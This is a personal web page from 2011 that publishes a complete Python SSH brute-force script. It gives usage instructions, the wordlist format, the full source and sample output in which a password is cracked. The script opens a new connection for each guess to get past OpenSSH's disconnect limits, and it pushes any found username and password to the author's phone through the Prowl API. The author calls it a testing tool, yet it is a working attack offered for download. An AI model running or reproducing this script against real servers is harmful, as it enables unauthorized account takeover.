• cd ..

• Index
• SSH Bruteforcer with Prowl Push notifications
• Usage
• Passwordlist
• Bruteforce.py
• Example_Output
• Author

---

SSH Bruteforcer with Prowl Push notifications

Topp

This is a script I made to test the general password strength for the Administrator/root account on servers at my work. It uses a file as backend, preferably a wordlist, to try and bruteforce the password on an account of your choice, after succeeding it'll print out the password and send a push notification using Prowl to your iPhone or other iOS device with the username and password. I made the latter because I like being able to leave things unattended and get notified when they are done. Which you might have seen from my other scripts. To avoid the usual socket close which, for example, OpenSSH has after about 3-5 passwords. It creates a new connection for every attempt. So it won't disconnect you after too many attempts(unless iptables/pf is configured to do so).

This script, however, depends on a few libs. So any scriptkiddie can't just wget/fetch it onto a random server and start using it. You need to be root OR be able to install required libs before running this script. And on top of that, it's not fast, and it doesn't support threading! It tries about 1 password/second. Making it about 3600 passwords every hour! Therefor, this is NOT an ideal script for scriptkiddies, so move on. This is for testing only. You can download the script here.

Usage

phone:~# ./bruteforce.py
Usage: ./bruteforce.py host port username passwordlist(file) prowl_apikey(optional for push)
phone:~# 

Password list format

The password file is pretty straight forward. Just type all the words you want to try on a new line in the file. Example follows.

Password1
Password2
Password3
Password4
etc

These can be words or whatever you want. Doesn't matter what file format really, as long as it's plain text. The script does however strip white spaces and such at the beginning and end of each line(password).

Bruteforce.py source

The source follows. If I remember correctly, the only non-standard libs are httplib, urllib and paramiko. I don't remember what httplib and urllib is called in Debian GNU/Linux. But paramiko can be installed with:

$ apt-get install python-paramiko

1. #!/usr/bin/python
2. 
3. import paramiko
4. import sys
5. import socket
6. from httplib import HTTPSConnection as https
7. from urllib import urlencode
8. 
9. ###############################################
10. #
11. # Author: sniker
12. # Contact: irc.eth0.info
13. #
14. # eth0 will prevail. || irc.eth0.info
15. #
16. ##############################################
17. 
18. API_DOMAIN = 'prowl.weks.net'
19. __version__ = "0.3"
20. 
21. def post(apikey, application, event, description, priority):
22. 
23.     headers = {'User-Agent': application + "/%s" % str(__version__),
24.                 'Content-type': "application/x-www-form-urlencoded"}
25. 
26.     h = https(API_DOMAIN)
27. 
28.     data = {
29.             'apikey': apikey,
30.             'application': application,
31.             'event': event,
32.             'description': description,
33.             'priority': priority
34.     }
35. 
36.     h.request( "POST", "/publicapi/add", headers = headers, body = urlencode(data))
37. 
38. def check(host, p, user, passw):
39.     ssh = paramiko.SSHClient()
40.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
41. 
42.     try:
43.         ssh.connect(host, port=p, username=user, password=passw)
44.         return True
45.     except paramiko.AuthenticationException:
46.         return False
47.     except paramiko.SSHException:
48.         sys.exit("Random SSH Exception")
49.     except socket.error:
50.         sys.exit("socket error(timeout, connection refused etc)")
51. 
52. if len(sys.argv) < 5:
53.     print "Usage: "+ sys.argv[0] +" host port username passwordlist(file) prowl_apikey(optional for push)"
54.     sys.exit(1)
55. 
56. print "Trying to hax " + sys.argv[3] + "@"+ sys.argv[1] +":"+ sys.argv[2] +"\n"
57. 
58. f = open(sys.argv[4], "r")
59. 
60. for line in f:
61.     line = line.strip()
62.     print "Trying " + line
63. 
64. 
65.     if check(sys.argv[1], int(sys.argv[2]), sys.argv[3], line):
66.         print "Headshot @ "+ sys.argv[3] + ": " + line
67.         try:
68.             post(sys.argv[5], "Bruteforce", "HIT!", "Password for "+ sys.argv[3] + "@"+ sys.argv[1] + ":"+ sys.argv[2] +" is: "+ line, 0)
69.         except IndexError:
70.             sys.exit(1)
71.         sys.exit(1)

That should be about it. Works for me, should work for you!

Example output

phone:~# ./bruteforce.py shell.eth0.info 11111 test list.txt [API_key_removed]
Trying to hax test@shell.eth0.info:11111

Trying lol
Trying sdfdsf
Trying tewwer
Trying hdghgfdhdf
Trying lulz
Trying sdf
Trying hghtert2tre
Trying yfhsgs245
Trying god
Trying love
Trying sucks
Trying Poomaif7
Headshot @ test: Poomaif7
phone:~# 

Iphone screenshot!

Author

sniker[at]codebase[dot]nu

Updated Tue, 07 Jun 2011 00:06:41 +0200

Topp